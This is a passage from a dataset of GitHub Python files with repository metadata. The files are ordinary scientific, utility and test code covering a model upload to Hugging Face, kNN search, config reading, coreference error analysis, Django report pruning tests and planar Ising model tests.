label=\"OBABO\", c=c)\n# ax2.plot(np.log10(N_axis), np.log10(dist_mse), c=c)\n# # ax2.scatter(N_axis, np.log(dist_mse), s=80, label=\"distributional mse\")\n# ax2.set_ylabel(r\"log$_{{10}}$(mse)\")\n# ax2.set_xlabel(r\"log$_{{10}}$(N)\")\n# fig2.suptitle(r\"Method Convergence on HO, Additive Noise $\\sigma$=0.1, $h$=0.05\") \n# fig2.legend()\n \n\nplt.show()","repo_name":"SchroedingersLion/GaussianMixtureSampling","sub_path":"plot_histo.py","file_name":"plot_histo.py","file_ext":"py","file_size_in_byte":3541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"4816330188","text":"import os\n\nimport numpy as np\nfrom datasets import Dataset\nfrom huggingface_hub import push_to_hub_keras\nfrom huggingface_hub import upload_file\nfrom doe2vec import doe_model\nimport tensorflow as tf\n\nmodel_type = \"VAE\"\nkl_weight = 0.001\nn = 250000\nseed = 0\ndir = \"../models\"\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0\"\nos.environ['TF_FORCE_GPU_ALLOW_GROWTH'] = 'true'\ntf.config.experimental.enable_tensor_float_32_execution(False)\nfor d in [2]:\n #push data\n functions = np.load(\n f\"{dir}/functions_d{d}-n{n}.npy\"\n )\n datadict = {\n \"function\": functions,\n }\n dataset = Dataset.from_dict(datadict)\n dataset.push_to_hub(\n f\"{n}-randomfunctions-{d}d\"\n )\n for m in [8]:\n for latent_dim in [24]:\n obj = doe_model(\n d,\n m,\n n=250000,\n latent_dim=latent_dim,\n kl_weight=kl_weight,\n use_mlflow=False,\n )\n if not obj.loadModel(\"../models/\"):\n obj.generateData()\n obj.compile()\n obj.fit(100)\n obj.save(\"../models/\")\n push_to_hub_keras(\n obj.autoencoder,\n f\"doe2vec-d{d}-m{m}-ls{latent_dim}-{model_type}-kl{kl_weight}\",\n )\n \n readme = f\"\"\"---\nlanguage:\n- en\nlicense: apache-2.0\nlibrary_name: keras\ntags:\n- doe2vec\n- exploratory-landscape-analysis\n- autoencoders\ndatasets:\n- BasStein/{n}-randomfunctions-{d}d\nmetrics:\n- mse\nco2_eq_emissions:\n emissions: 0.0363\n source: \"code carbon\"\n training_type: \"pre-training\"\n geographical_location: \"Leiden, The Netherlands\"\n hardware_used: \"1 Tesla T4\"\n---\n\n## Model description\n\nDoE2Vec model that can transform any design of experiments (function landscape) to a feature vector. \nFor different input dimensions or sample size you require a different model. \nEach model name is build up like doe2vec-d{{dimension\\}}-m{{sample size}}-ls{{latent size}}-{{AE or VAE}}-kl{{Kl loss weight}}\n\nExample code of loading this huggingface model using the doe2vec package.\n\nFirst install the package\n\n```zsh\npip install doe2vec\n```\n\nThen import and load the model.\n\n```python\nfrom doe2vec import doe_model\n\nobj = doe_model(\n {d},\n {m},\n latent_dim={latent_dim},\n kl_weight={kl_weight},\n model_type=\"{model_type}\"\n)\nobj.load_from_huggingface()\n#test the model\nobj.plot_label_clusters_bbob()\n```\n\n## Intended uses & limitations\n\nThe model is intended to be used to generate feature representations for optimization function landscapes.\nThe representations can then be used for downstream tasks such as automatic optimization pipelines and meta-learning.\n\n\n## Training procedure\n\nThe model is trained using a weighed KL loss and mean squared error reconstruction loss.\nThe model is trained using 250.000 randomly generated functions (see the dataset) over 100 epochs.\n\n- **Hardware:** 1x Tesla T4 GPU\n- **Optimizer:** Adam\n\n\"\"\"\n text_file = open(\"README.md\", \"wt\")\n n = text_file.write(readme)\n text_file.close()\n upload_file(\n path_or_fileobj=\"README.md\", \n path_in_repo=\"README.md\", \n repo_id= f\"BasStein/doe2vec-d{d}-m{m}-ls{latent_dim}-{model_type}-kl{kl_weight}\"\n )\n","repo_name":"Basvanstein/doe2vec","sub_path":"experiments/push_to_huggingface.py","file_name":"push_to_huggingface.py","file_ext":"py","file_size_in_byte":3314,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"36151187927","text":"\"\"\"k-Nearest Neighbors (kNN) model for finding the k nearest neighbors for a given query set in a target set.\"\"\"\n\n\nimport numpy as np\nfrom sklearn.neighbors import NearestNeighbors\n\n\ndef knn(\n query_vec: np.ndarray, target_vec: np.ndarray, k: int, distance_metric: str = \"euclidean\"\n) -> tuple[np.ndarray, np.ndarray]:\n \"\"\"Find the k nearest neighbors of a query vector within a target vector.\n\n Args:\n query_vec (np.ndarray): The query vector.\n target_vec (np.ndarray): The target vector.\n k (int): The number of nearest neighbors to find.\n distance_metric (str, optional): The distance metric to use.\n Defaults to \"euclidean\".\n\n Returns:\n tuple[np.ndarray, np.ndarray]: The indices and distances of the k nearest neighbors.\n \"\"\"\n # Create a NearestNeighbors object and fit the target vector\n nbrs = NearestNeighbors(n_neighbors=k, algorithm=\"brute\", metric=distance_metric).fit(\n target_vec\n )\n # Find the k nearest neighbors of the query vector\n distances, indices = nbrs.kneighbors(query_vec)\n return indices, distances\n","repo_name":"SebastiaanJohn/knn-nbr-analysis","sub_path":"src/models/knn.py","file_name":"knn.py","file_ext":"py","file_size_in_byte":1110,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"3373567514","text":"import configparser\nimport os,sys\npwd=os.getcwd()\nbase_path=os.path.abspath(os.path.dirname(os.path.dirname(__file__)))\n\n\nclass GitIni:\n\n def get_ini(self):\n \"获取所有配置文件中的数据\"\n file_path = base_path+'/Config/server.ini'\n cf = configparser.ConfigParser()\n cf.read(file_path,encoding=\"utf-8-sig\")\n return cf\n\n def get_value(self,key,node=None):\n if node==None:\n node = 'server'\n cf = self.get_ini()\n try:\n data = cf.get(node,key)\n except Exception as e:\n print(\"没有获取到值\")\n data = None\n return data\nconfig_data = GitIni()\n\nif __name__ == \"__main__\":\n\n print(GitIni().get_value(\"host\"))","repo_name":"319jin/interface","sub_path":"Base/read_ini.py","file_name":"read_ini.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"39095161650","text":"import numpy as np\nfrom scipy.interpolate import interp1d\nimport argparse\n\ndef main():\n parser = argparse.ArgumentParser(\"Dummy forward model\")\n parser.add_argument(\"finput\", type=str,\n help=\"The input file name\")\n parser.add_argument(\"-n\", type=int, default=1000,\n help=\"The number of output values (default: 1000)\")\n parser.add_argument(\"-o\", type=str, default=\"output.txt\",\n help=\"The output file name (default: 'output.txt')\")\n parser.add_argument(\"-t\", type=str, default=\"cubic\",\n help=\"Interpolation type (default: 'cubic')\")\n args = parser.parse_args()\n\n # normalize the input arguments\n args.t = args.t.lower().strip()\n args.o = args.o.strip()\n\n # check if args.t is among the options\n interp_types = [\"cubic\", \"quadratic\", \"linear\"]\n if args.t not in interp_types:\n raise RuntimeError(\"Argument -t must be one of %s\" % str(interp_types))\n\n # execute the main program\n execprog(args)\n\ndef execprog(args):\n finput = args.finput\n nout = args.n\n foutput = args.o\n interp_kind = args.t.lower().strip()\n\n # read the input\n yinp = np.loadtxt(finput).ravel()\n ninp = len(yinp)\n xinp = np.linspace(0.0, 1.0, ninp)\n\n # interpolate\n xout = np.linspace(0.0, 1.0, nout)\n finterp = interp1d(xinp, yinp, kind=interp_kind)\n yout = finterp(xout)\n\n # write the output to the output file\n np.savetxt(foutput, yout)\n","repo_name":"mfkasim1/dummy-forward-model","sub_path":"dummyfm/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"1381098119","text":"import csv # 调用数据保存文件\nimport pandas as pd # 用于数据输出\ndatas = open(\"/Users/zhouzilei/Desktop/data.txt\", \"r\", encoding=\"utf-8\")\nlines = datas.readlines()\nlist=[]\nfor line in lines:\n line = line.replace(' ', '') # 先把空格去掉\n if line.split(':')[0] == \"group\":\n group = line.split(':')[1].replace('\\n', '').replace(' ', '') # 获得group\n list.append(group)\nall=set(list)\ncolumn = ['group']\ntest = pd.DataFrame(columns=column,data=all) # 将数据放进表格\ntest.to_csv('category.csv') # 数据存入csv,存储位置及文件名称\n","repo_name":"Zzl3/Cloud_Computing","sub_path":"python脚本/category.py","file_name":"category.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"21956961764","text":"import sys\r\nfrom queue import Queue\r\n\r\nn, k = map(int, sys.stdin.readline().split())\r\n\r\nQ = Queue()\r\n\r\nfor i in range(1, n + 1):\r\n Q.put(i)\r\n\r\nk_list = []\r\nwhile Q.qsize() != 0:\r\n for _ in range(k - 1):\r\n Q.put(Q.get())\r\n k_list.append(Q.get())\r\n\r\nprint(\"<\", end=\"\")\r\nfor i in k_list[: n - 1]:\r\n print(i, end=\", \")\r\nprint(k_list[n - 1], end=\"\")\r\nprint(\">\")\r\n","repo_name":"kyu3638/baekjoon_kyu3638","sub_path":"백준/Silver/11866. 요세푸스 문제 0/요세푸스 문제 0.py","file_name":"요세푸스 문제 0.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"4393607514","text":"from ..crud import get_db_url_by_key, create_db_url\nfrom ..schemas import URLBase\nfrom sqlalchemy.orm import Session\nfrom .db_fixtures import session\n\n\ndef test_create_db_url(session: Session):\n url_base = URLBase(target_url=\"https://example.com\")\n db_url = create_db_url(session, url_base)\n assert db_url.id_ is not None\n assert db_url.clicks == 0\n assert db_url.is_active == True\n assert db_url.key is not None\n\n\ndef test_get_url_by_key(session: Session):\n item = get_db_url_by_key(session, \"EYJEA\")\n assert item.key == \"EYJEA\"\n","repo_name":"Yaeger42/traxionch","sub_path":"shortener_app/tests/test_crud.py","file_name":"test_crud.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"10787640605","text":"# Time: O(nlogn)\n# Space: O(n)\n\nimport heapq\n\n\n# prefix sum, greedy, heap\nclass Solution(object):\n def makePrefSumNonNegative(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n result = prefix = 0\n min_heap = []\n for x in nums:\n heapq.heappush(min_heap, x)\n prefix += x\n if prefix < 0:\n prefix -= heapq.heappop(min_heap)\n result += 1\n return result\n","repo_name":"kamyu104/LeetCode-Solutions","sub_path":"Python/make-the-prefix-sum-non-negative.py","file_name":"make-the-prefix-sum-non-negative.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","stars":4314,"dataset":"github-code","pt":"40"} +{"seq_id":"14359105250","text":"from fastapi import APIRouter\nfrom fastapi import Depends\nfrom fastapi_jwt_auth import AuthJWT\n\nfrom app.data.repository import Repository\n\nrouter = APIRouter()\n\n\n@router.get('/profile/doctor/{user_id}')\nasync def get_doctor_profile(user_id: str, Authorize: AuthJWT = Depends()):\n \"\"\"\n Get data for doctor's profile\n\n :param user_id: Id of doctor in database\n :return: doctor data\n \"\"\"\n Authorize.jwt_required()\n doctor_profile = Repository.get_doctor_by_id(user_id)\n\n return {'data': doctor_profile, 'result': bool(doctor_profile)}\n\n\n@router.post('/doctors/search/')\nasync def get_doctors_by_filter(filter: dict, Authorize: AuthJWT = Depends()):\n \"\"\"\n Get doctors list by features for search engine.\n\n :param filter: dict (column:\"value\") of features to search for.\n :return: list of found doctors.\n \"\"\"\n Authorize.jwt_required()\n list_doctors = Repository.get_doctor_by_dict(filter)\n\n return list_doctors\n\n\n@router.get('/doctors/')\nasync def get_all_doctors(Authorize: AuthJWT = Depends()):\n \"\"\"\n Get all doctors from database\n\n :return: list of doctors\n \"\"\"\n Authorize.jwt_required()\n list_doctors = Repository.get_all_doctors()\n\n return {'data': list_doctors, 'result': bool(list_doctors)}\n","repo_name":"zelenyid/medicine_center","sub_path":"app/api/doctors.py","file_name":"doctors.py","file_ext":"py","file_size_in_byte":1263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"72777286201","text":"\"\"\"CP1404 Prac\nWalk given dir and Create dirs from file extensions in root;\n Move files into respective dirs\"\"\"\n\nimport os\nimport shutil\n\nROOT = r'.\\FilesToSort'\n\n\ndef main():\n \"\"\"Main loop for dir creation and file move\"\"\"\n extensions = []\n\n os.chdir(ROOT)\n root = \".\"\n\n for dirname, subdirs, filenames in os.walk('.'):\n print(\"Directory:\", dirname)\n print(\"\\tcontains subdirectories:\", subdirs)\n print(\"\\tand files:\", filenames)\n print(\"(Current working directory is: {})\".format(os.getcwd()))\n\n # Not efficient. is called in every subdirectory.\n create_file_ext_directories(root, extensions, filenames)\n # Tries to move files to non-existent dir\n move_files_to_ext_dirs(root, dirname, filenames)\n\n print(extensions)\n\n\ndef move_files_to_ext_dirs(root, dirname, filenames):\n \"\"\"Given a dir with name==ext, move file there\"\"\"\n for name in filenames:\n\n filename, ext = name.split(\".\")\n\n # shutil.move requires full path names\n filename = os.path.join(dirname, name)\n destination = os.path.join(root, ext)\n print(destination)\n\n try:\n shutil.move(filename, destination)\n print(name, \" moved to \", destination)\n except FileNotFoundError as error:\n print(error)\n except shutil.Error as error: # package Error\n # File exists - will not duplicate\n print(error)\n\n\ndef create_file_ext_directories(root, extensions, filenames):\n \"\"\"From os.walk() create dirs from set of extensions in dir\"\"\"\n for name in filenames:\n filename, ext = name.split('.')\n\n if ext not in extensions:\n extensions.append(ext)\n try:\n os.mkdir(os.path.join(root, ext))\n except FileExistsError:\n pass\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Davvott/CP1404","sub_path":"prac_09/sort_files_1.py","file_name":"sort_files_1.py","file_ext":"py","file_size_in_byte":1878,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"74976136760","text":"import cv2\nimport pytesseract\n\ndef extract():\n # Read the image using OpenCV\n image = cv2.imread(\"/home/gabriel/Desktop/python/groceryListProject/GroceryListProj/data/captured_image.jpg\") # Replace \"image.png\" with the path to your image file\n #cv2.imshow('Loaded Image', image)\n\n # Convert the image to grayscale (optional but can help with text extraction)\n #gray_image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\n # Use pytesseract to extract text from the grayscale image\n extracted_text = pytesseract.image_to_string(image, lang='eng')\n\n # Print the extracted text\n print(extracted_text)\n\ndef main():\n extract()\n\nif __name__ == '__main__':\n main()","repo_name":"Polymath3745/GroceryListProj","sub_path":"utils/interpret.py","file_name":"interpret.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"30622874933","text":"#!/usr/bin/python\n# File Name : sieve_errors.py\n# Purpose : Analyze the types of errors that the Sieve is making.\n# Creation Date : 11-20-2013\n# Last Modified : Wed 29 Jan 2014 09:33:28 PM MST\n# Created By : Nathan Gilbert\n#\nimport sys\nimport collections\n\nfrom pyconcile import reconcile\nfrom pyconcile import utils\nimport specificity_utils\n\n#DONE: cases where the correct antecedent is further than 5 sentences away\n#TODO: cases where there is a closer \"same-semantic-type\" than the true\n# antecedent\n#TODO: cases where other heuristics are stopping the resolution -- may need to\n# look at other output\n#TODO: grab cases where no resolution is made\n\nclass Noun:\n def __init__(self, h):\n self.head = h\n self.instances = {} #doc:start:end -> text\n self.antecedents = {} #doc:start:end -> ante_text\n self.labels = {} #doc:start:end -> True/False\n self.true_antecedent_distances = {} #doc:start:end -> sentence distance\n # of closest true antecedent\n self.resp_antecedent_distances = {} #doc:start:end -> sentence distance\n #of response antencedent\n self.incorrect_ante_sc = {} #doc:start:end -> #\n\n def greaterThan5(self):\n five = 0\n for key in list(self.true_antecedent_distances.keys()):\n if self.true_antecedent_distances[key] > 4:\n five += 1\n return five\n\n def baseAntencedent(self):\n ba = 0\n for key in list(self.true_antecedent_distances.keys()):\n if self.true_antecedent_distances[key] < 0 :\n ba += 1\n return ba\n\n def count(self):\n return len(list(self.instances.keys()))\n\n def num_correct(self):\n return len([x for x in list(self.labels.values()) if x == True])\n\ndef closest_antecedent(gold_chains, mention):\n \"\"\"returns the closest antecedent in the text. if base antecedent,\n returns None\"\"\"\n #find this mention in gold chains\n for key in list(gold_chains.keys()):\n prev = None\n for other in gold_chains[key]:\n if mention == other:\n return prev\n else:\n prev = other\n return None\n\ndef getAnnotSentenceNum(sentences, annot):\n \"\"\"return the integer of the sentence the annot is found in.\"\"\"\n if annot is None:\n return -1\n\n i = 0\n for s in sentences:\n if s.contains(annot):\n return i\n i += 1\n return -1\n\ndef getAnnotSemanticClass(nes, annot):\n if annot is None:\n return None\n return nes.getAnnotBySpan(annot.getStart(), annot.getEnd())[\"NE_CLASS\"]\n\nif __name__ == \"__main__\":\n if len(sys.argv) < 2:\n print(\"Usage: %s \" % (sys.argv[0]))\n sys.exit(1)\n\n FAUX_PRONOUNS = []\n with open(sys.argv[2], 'r') as fauxFile:\n for line in fauxFile:\n if line.startswith(\"#\"):\n continue\n line=line.strip()\n FAUX_PRONOUNS.append(line)\n\n PREDICTIONS = \"features.goldnps/predictions.StanfordSieve.all_commons/\"\n #PREDICTIONS = \"features.goldnps/predictions.StanfordSieve.bare_definites/\"\n\n files = []\n tracked_nouns = {} #head -> Noun instance\n with open(sys.argv[1], 'r') as fileList:\n files.extend([x for x in fileList.readlines() if not x.startswith(\"#\")])\n\n overall_sc_errors = {}\n for f in files:\n f=f.strip()\n #print \"Working on file: {0}\".format(f)\n\n #get the gold chains\n gold_chains = reconcile.getGoldChains(f)\n gold_nes = reconcile.getGoldNEs(f)\n\n #get faux pronouns\n try:\n faux_pronoun_pairs = reconcile.getFauxPairs(f, PREDICTIONS)\n except:\n #then one was not created for this document (ACE04-33 is one.)\n continue\n\n #get the sentences \n sentences = reconcile.getSentences(f)\n\n #remove the pairs we don't care about\n tracked_pairs = []\n for pair in faux_pronoun_pairs:\n ana_head = specificity_utils.getHead(pair[1].getText()).lower()\n if ana_head in FAUX_PRONOUNS:\n if ana_head not in list(tracked_nouns.keys()):\n tracked_nouns[ana_head] = Noun(ana_head)\n tracked_pairs.append(pair)\n\n #label the correct or incorrect pairs\n labeled_faux_pairs = reconcile.labelCorrectPairs(gold_chains,\n tracked_pairs)\n\n for lpair in labeled_faux_pairs:\n ana_head = specificity_utils.getHead(lpair[1].getText()).lower()\n key = \"{0}:{1}:{2}\".format(f, lpair[1].getStart(),\n lpair[1].getEnd())\n\n tracked_nouns[ana_head].instances[key] = utils.textClean(lpair[1].getText())\n tracked_nouns[ana_head].antecedents[key] = utils.textClean(lpair[0].getText())\n tracked_nouns[ana_head].labels[key] = lpair[2]\n\n #this is an incorrect antecedent\n if not lpair[2]:\n closest_true_antecedent = closest_antecedent(gold_chains,\n lpair[1])\n\n #deals with sentence distance\n resp_ant_sent = getAnnotSentenceNum(sentences, lpair[1])\n true_ant_sent = getAnnotSentenceNum(sentences, closest_true_antecedent)\n ana_sent = getAnnotSentenceNum(sentences, lpair[1])\n\n if closest_true_antecedent is not None:\n true_dist = ana_sent - true_ant_sent\n else:\n true_dist = -1\n resp_dist = ana_sent - resp_ant_sent\n\n tracked_nouns[ana_head].true_antecedent_distances[key] = true_dist\n tracked_nouns[ana_head].resp_antecedent_distances[key] = resp_dist\n\n #deals with semantic issues\n true_ant_sc = getAnnotSemanticClass(gold_nes,closest_true_antecedent)\n ana_sc = getAnnotSemanticClass(gold_nes, lpair[1])\n\n if (closest_true_antecedent is not None) and (true_ant_sc != ana_sc):\n #this case captures when the true antecedent has a\n #different semantic class than the anaphor\n tracked_nouns[ana_head].incorrect_ante_sc[key] = true_ant_sc\n else:\n #this captures the semantic class that caused the\n #incorrect resolution\n overall_sc_errors[ana_sc] = overall_sc_errors.get(ana_sc,0) + 1\n\n stn = sorted(list(tracked_nouns.values()), key=lambda x : x.count(), reverse=True)\n for tn in stn:\n print(\"Head: {0}\".format(tn.head))\n print(\"\\tresolutions: {0} / {1} = {2:.2f}\".format(tn.num_correct(), tn.count(),\n float(tn.num_correct()) / tn.count()))\n print(\"\\t>5 antecedents: {0}\".format(tn.greaterThan5()))\n print(\"\\tno antecedents: {0}\".format(tn.baseAntencedent()))\n print(\"\\tincorrect sem: {0}\".format(len(list(tn.incorrect_ante_sc.keys()))))\n\n incorrect = []\n for ant in list(tn.antecedents.keys()):\n if not tn.labels[ant]:\n incorrect.append(tn.antecedents[ant])\n most_common_incorrect = collections.Counter(incorrect).most_common(5)\n\n print(\"\\ttop 5 incorrect: {0}\".format(\", \".join([x[0] for x in most_common_incorrect])))\n print(\"=\"*72)\n\n total_sc_errors = sum(overall_sc_errors.values())\n for key in list(overall_sc_errors.keys()):\n print(\"{0:15} : {1:3} : {2:.2f}\".format(key, overall_sc_errors[key],\n float(overall_sc_errors[key]) / total_sc_errors))\n\n","repo_name":"nathan-gilbert/pyconcile","sub_path":"lexical_research_tools/specificity/sieve_errors.py","file_name":"sieve_errors.py","file_ext":"py","file_size_in_byte":7610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"70151925240","text":"from datetime import datetime, timedelta\nfrom django.test import TestCase\nfrom django.utils import timezone\nfrom apps.dashboard.models import EvaluationType, MaturityModelItem, EvaluationReport, EvaluationRequest\nfrom apps.dashboard.tests.utils import DjangoCurrentTimeMock, setup_basic_environment\nfrom apps.custom_scripts.evaluation_report_pruning import remove_repeater_evaluation_reports\n\n\nclass Test(TestCase):\n def setUp(self):\n self.env = setup_basic_environment()\n\n def test_burst_logically_equal_evaluation_reports_of_non_manual_items_should_be_reduced_to_one(self):\n evaluation_type_non_manual = EvaluationType.objects.create(\n kind=EvaluationType.KIND_TEST_COVERAGE, # Arbitrary non-manual type\n validity_period_days=1,\n )\n self.mm_item_non_manual = MaturityModelItem.objects.create(\n code=\"N000\",\n name=\"Test Coverage\",\n evaluation_type=evaluation_type_non_manual,\n maturity_model_level=self.env.maturity_model_level,\n acceptable_value=\"50\"\n )\n non_manual_evaluation_reports = [\n self._create_non_manual_evaluation_report(60),\n self._create_non_manual_evaluation_report(60),\n self._create_non_manual_evaluation_report(70),\n ]\n\n remove_repeater_evaluation_reports()\n\n self.assertEqual(EvaluationReport.objects.filter(maturity_model_item=self.mm_item_non_manual).count(), 2)\n first_non_manual_evaluation_report = EvaluationReport.objects.order_by('creation_time').first()\n self.assertEqual(first_non_manual_evaluation_report.creation_time, non_manual_evaluation_reports[0].creation_time)\n self.assertEqual(first_non_manual_evaluation_report.latest_evaluation_time, non_manual_evaluation_reports[1].latest_evaluation_time)\n\n def test_evaluation_reports_of_manual_items_should_not_be_deleted(self):\n evaluation_type_manual = EvaluationType.objects.create(\n kind=EvaluationType.KIND_MANUAL,\n )\n self.mm_item_manual = MaturityModelItem.objects.create(\n code=\"M000\",\n name=\"Manual\",\n evaluation_type=evaluation_type_manual,\n maturity_model_level=self.env.maturity_model_level,\n )\n self._create_manual_evaluation_request_and_report(\"test 1\")\n self._create_manual_evaluation_request_and_report(\"test 1\")\n self._create_manual_evaluation_request_and_report(\"test 2\")\n\n remove_repeater_evaluation_reports()\n\n self.assertEqual(EvaluationReport.objects.filter(maturity_model_item=self.mm_item_manual).count(), 3)\n\n def test_evaluation_report_should_not_be_merged_with_previous_evaluation_report_that_is_not_in_validity_period(self):\n validity_period_days = 1\n evaluation_type_non_manual = EvaluationType.objects.create(\n kind=EvaluationType.KIND_TEST_COVERAGE, # Arbitrary non-manual type\n validity_period_days=validity_period_days,\n )\n self.mm_item_non_manual = MaturityModelItem.objects.create(\n code=\"N000\",\n name=\"Test Coverage\",\n evaluation_type=evaluation_type_non_manual,\n maturity_model_level=self.env.maturity_model_level,\n acceptable_value=\"50\"\n )\n now = timezone.make_aware(datetime(2000, 1, 1))\n with DjangoCurrentTimeMock(now):\n self._create_non_manual_evaluation_report(current_value=\"60\")\n\n with DjangoCurrentTimeMock(now + timedelta(days=validity_period_days + 1)):\n self._create_non_manual_evaluation_report(current_value=\"60\")\n\n remove_repeater_evaluation_reports()\n\n self.assertEqual(EvaluationReport.objects.filter(maturity_model_item=self.mm_item_non_manual).count(), 2)\n\n def _create_non_manual_evaluation_report(self, current_value):\n evaluation_report = EvaluationReport.create_new(\n project=self.env.project,\n maturity_model_item=self.mm_item_non_manual,\n status=EvaluationReport.STATUS_PASS,\n current_value=current_value,\n )\n evaluation_report.save()\n evaluation_report.refresh_from_db()\n return evaluation_report\n\n def _create_manual_evaluation_request_and_report(self, description):\n EvaluationRequest.objects.create(\n project=self.env.project,\n maturity_model_item=self.mm_item_manual,\n applicant=self.env.user,\n )\n EvaluationReport.create_new(\n project=self.env.project,\n maturity_model_item=self.mm_item_manual,\n status=EvaluationReport.STATUS_PASS,\n description=description,\n ).save()\n","repo_name":"sahabpardaz/nemo","sub_path":"backend/apps/custom_scripts/tests/test_evaluation_pruning.py","file_name":"test_evaluation_pruning.py","file_ext":"py","file_size_in_byte":4700,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"21465784059","text":"from marshmallow import ValidationError\n\n\ndef validate_lower_upper_fields(\n data: dict,\n lower_key: str,\n upper_key: str,\n message_case_none: str,\n message_case_bigger: str,\n):\n lower = data.get(lower_key, None)\n upper = data.get(upper_key, None)\n if (lower is None and upper is not None) or (lower is not None and upper is None):\n raise ValidationError(message_case_none)\n if lower is None and upper is None:\n return # Nothing to do here\n if lower > upper:\n raise ValidationError(message_case_bigger)\n","repo_name":"poh42/TDapp","sub_path":"utils/validation.py","file_name":"validation.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"15871966720","text":"import numpy as np\nimport matplotlib\nfrom matplotlib import pyplot as plt\nimport time\n\nfrom planar_ising import PlanarGraphGenerator, DecompGraph, \\\n DecompInferenceAndSampling, SmallInferenceAndSampling\n\nnp.random.seed(42)\nmatplotlib.rcParams.update({'font.size': 15})\n\n\ndef make_k5():\n\n return np.array([[0, 1], [0, 2], [0, 3], [0, 4], [1, 2],\n [1, 3], [1, 4], [2, 3], [2, 4], [3, 4]])\n\ndef generate_k33free_graph(size):\n\n graph = DecompGraph()\n graph.add_component(True, make_k5())\n graph_size = 5\n\n while graph_size != size:\n\n parent_index = np.random.choice(graph.nodes_count)\n parent_node = graph.nodes[parent_index]\n \n if graph.is_small_node[parent_index]:\n parent_edges_count = parent_node.shape[0]\n else:\n parent_edges_count = parent_node.edges_count\n\n parent_virtual_edge_index = np.random.choice(parent_edges_count)\n\n if graph.is_small_node[parent_index]:\n parent_connection_vertices = parent_node[parent_virtual_edge_index]\n else:\n parent_connection_vertices = \\\n np.array([parent_node.edges.vertex1[parent_virtual_edge_index],\n parent_node.edges.vertex2[parent_virtual_edge_index]])\n\n if graph_size + 3 <= size and np.random.rand() > 0.5:\n\n node = make_k5()\n edges_count = 10\n\n graph.add_component(True, node)\n graph_size += 3\n\n else:\n\n new_vertices_count = 1 + np.random.choice(size - graph_size)\n\n node = PlanarGraphGenerator.generate_random_graph(new_vertices_count + 2, 1.0)\n edges_count = node.edges_count\n\n graph.add_component(False, node)\n graph_size += new_vertices_count\n \n node_index = graph.nodes_count - 1\n\n virtual_edge_index = np.random.choice(edges_count)\n\n if graph.is_small_node[node_index]:\n connection_vertices = node[virtual_edge_index]\n else:\n connection_vertices = np.array([node.edges.vertex1[virtual_edge_index],\n node.edges.vertex2[virtual_edge_index]])\n \n graph.add_connection(parent_index, node_index, parent_connection_vertices,\n connection_vertices)\n\n graph.enumerate()\n\n return graph\n\ndef simulate_and_test_logpf_computation(interaction_values_std):\n\n start = time.time()\n \n sizes = np.arange(10, 16)\n\n models_per_size = 1000\n\n maximal_relative_error = 0.0\n\n for size in sizes:\n for sample_index in range(models_per_size):\n\n graph = generate_k33free_graph(size)\n inference = DecompInferenceAndSampling(graph)\n inference.prepare()\n\n interaction_values = np.random.normal(scale=interaction_values_std,\n size=graph.edges_count)\n\n logpf, marginals = inference.compute_logpf(interaction_values,\n with_marginals=True)\n\n bf_inference = SmallInferenceAndSampling(graph.get_edges(),\n np.array([], dtype=int))\n bf_logpf, bf_marginals = bf_inference.compute_logpf(interaction_values,\n np.array([], dtype=int), with_marginals=True)\n\n relative_error = np.absolute((logpf - bf_logpf)/bf_logpf)\n\n if relative_error > maximal_relative_error:\n maximal_relative_error = relative_error\n\n relative_error = np.linalg.norm(marginals - bf_marginals)/\\\n np.linalg.norm(bf_marginals)\n\n if relative_error > maximal_relative_error:\n maximal_relative_error = relative_error\n\n print('{0} random models of sizes {1} were evaluated.'.format(\n models_per_size*len(sizes), tuple(sizes)))\n print('Maximal relative error is {}.'.format(maximal_relative_error))\n print('{:.2f} seconds passed'.format(time.time() - start))\n\ndef collect_kl_statistics(interaction_values_std, model_sizes, models_per_size,\n sample_log2_sizes):\n\n kl_divergences = []\n\n start = time.time()\n \n for size in model_sizes:\n\n print('size', size)\n\n kl_divergences.append([])\n\n for model_index in range(models_per_size):\n\n kl_divergences[-1].append([])\n\n graph = generate_k33free_graph(size)\n edges = graph.get_edges()\n interaction_values = np.random.normal(scale=interaction_values_std,\n size=graph.edges_count)\n\n inference_and_sampling = DecompInferenceAndSampling(graph)\n inference_and_sampling.prepare(sampling=True)\n\n logpf = inference_and_sampling.compute_logpf(interaction_values)\n\n previous_sample_size = 0\n\n configuration_counts = {}\n \n for sample_size in 2**sample_log2_sizes:\n\n configurations = \\\n inference_and_sampling.sample_spin_configurations(sample_size - \\\n previous_sample_size, interaction_values)\n\n for configuration in configurations:\n\n configuration = 